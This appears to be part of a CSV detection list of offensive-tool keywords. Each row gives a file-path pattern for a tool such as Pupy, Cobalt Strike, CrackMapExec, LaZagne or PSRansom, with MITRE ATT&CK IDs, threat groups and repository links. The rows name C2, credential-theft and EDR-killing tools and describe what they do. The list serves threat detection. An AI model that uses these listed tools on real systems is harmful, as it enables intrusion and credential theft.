T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z"
+"*/procdump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*/process_herpaderping/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/process_killer.cpp*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z"
+"*/processhacker-*-bin.zip*","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0040 - TA0006 - TA0009","N/A","N/A","Credential Access - Persistence - Defense Evasion","https://processhacker.sourceforge.io/","1","1","N/A","7","10","N/A","N/A","N/A","N/A"
+"*/processhacker/files/latest/download*","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? 
can be used by attackers to dump process - create services and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0040 - TA0006 - TA0009","N/A","N/A","Credential Access - Persistence - Defense Evasion","https://processhacker.sourceforge.io/","1","1","N/A","7","10","N/A","N/A","N/A","N/A"
+"*/Process-Instrumentation-Syscall-Hook*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*/ProduKey.exe*","offensive_tool_keyword","produkey","ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. 
and you want to reinstall it on your computer.","T1003.001 - T1003.002 - T1012 - T1057 - T1518","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/product_cd_key_viewer.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/prometheus.exe","offensive_tool_keyword","prometheus","malware C2","T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment","1","1","N/A","10","10","176","63","2020-07-21T06:14:44Z","2018-09-04T15:38:53Z"
+"*/protocols/ftp.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*/protocols/ldap.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*/protocols/mssql.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*/protocols/rdp.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*/protocols/rdp.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*/protocols/smb.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*/protocols/ssh.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*/proxy/Tor.py*","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","148","44","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z"
+"*/proxy/tor_paths.py*","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - 
Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","148","44","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z"
+"*/Proxy_Def_File_Generator.cna*","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","10","10","125","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z"
+"*/proxychains.git*","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","1","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z"
+"*/proxymaybeshell*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/ps_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*/ps1_oneliner.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*/PS2EXE.git*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z"
+"*/ps2exe.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*/PS2EXE/*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z"
+"*/ps-empire*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - 
T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
+"*/psexec.json*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/psnuffle*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/PSpersist.git*","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0005 ","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","1","N/A","10","1","72","17","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z"
+"*/pspy -*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
+"*/PSPY.dll*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). 
The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","1","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
+"*/pspy.git*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
+"*/pspy.go*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
+"*/pspy/cmd*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
+"*/pspy32*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
+"*/pspy64*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
+"*/PSRansom -*","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. 
This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","4","371","95","2022-09-29T09:54:34Z","2022-02-27T11:52:03Z"
+"*/psscanner.go*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
+"*/PSSW100AVB*","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027","N/A","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","984","166","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z"
+"*/pswRecovery4Moz.txt*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z"
+"*/ptunnel-ng*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z"
+"*/puckiestyle/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/puckiestyle/CVE-2022-0847","1","1","N/A","N/A","1","1","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z"
+"*/puppet-naivesigning.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/pupwinutils/*.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*/pupy/*.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*/pupy/commands/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*/pupy/memimporter/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*/pupy/output/pupyx64*.exe*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*/pupy/pupygen.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*/pupy_load.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
